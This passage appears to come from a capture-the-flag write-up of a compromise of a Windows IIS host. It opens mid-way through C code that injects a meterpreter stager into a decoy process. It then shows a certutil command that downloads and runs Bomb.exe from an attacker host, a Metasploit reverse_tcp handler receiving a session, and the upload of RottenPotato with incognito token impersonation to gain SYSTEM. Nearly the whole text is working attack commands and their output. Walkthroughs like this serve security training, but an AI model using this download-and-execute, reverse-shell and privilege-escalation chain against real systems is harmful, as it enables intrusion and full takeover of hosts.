    pid = CreateDecoyProcess();   /* host process for the injected stager */
    if (!pid)
        return 1;
    InjectShellcode(shellcode, szShellcode, pid);
    return 0;
}
This injects the meterpreter stager into a remote process and runs it, after which we get a meterpreter session.
PS C:\windows\system32\inetsrv> cd \windows\temp
PS C:\windows\temp> cmd.exe /c certutil.exe -urlcache -split -f http://10.11.12.26:80/Bomb.exe c:\windows\temp\bomb1.exe
****  Online  ****
  000000  ...
  020c00
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> cmd.exe /c c:\windows\temp\bomb1.exe
Then our meterpreter session arrives at the Metasploit handler.
msf > handler -p windows/x64/meterpreter/reverse_tcp -H tun0 -P 443
[*] Payload handler running as background job 0.
[*] [2018.09.16-15:13:49] Started reverse TCP handler on 10.11.12.26:443
msf exploit(multi/handler) >
[*] [2018.09.16-15:14:07] Encoded stage with x64/xor
[*] [2018.09.16-15:14:07] Sending encoded stage (206447 bytes) to 192.168.56.100
[*] Meterpreter session 1 opened (10.11.12.26:443 -> 192.168.56.100:49187) at 2018-09-16 15:14:08 -0700
[*] AutoAddRoute: Routing new subnet 10.11.12.0/255.255.255.0 through session 1
[*] AutoAddRoute: Routing new subnet 192.168.56.0/255.255.255.0 through session 1
[-] The 'stdapi' extension has already been loaded.
meterpreter >
Now we only need to upload RottenPotato.exe to C:\windows\temp, run it, and impersonate the token it produces to get SYSTEM.
meterpreter > cd \\windows\\temp
meterpreter > upload /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato .
[*] uploading  : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/README.md -> .\README.md
[*] uploaded   : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/README.md -> .\README.md
[*] uploading  : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe
[*] uploaded   : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
IIS APPPOOL\DefaultAppPool

Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR

meterpreter > execute -f rottenpotato.exe
Process 1896 created.
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
As the output above shows, we obtained SYSTEM through meterpreter, so the challenge is complete.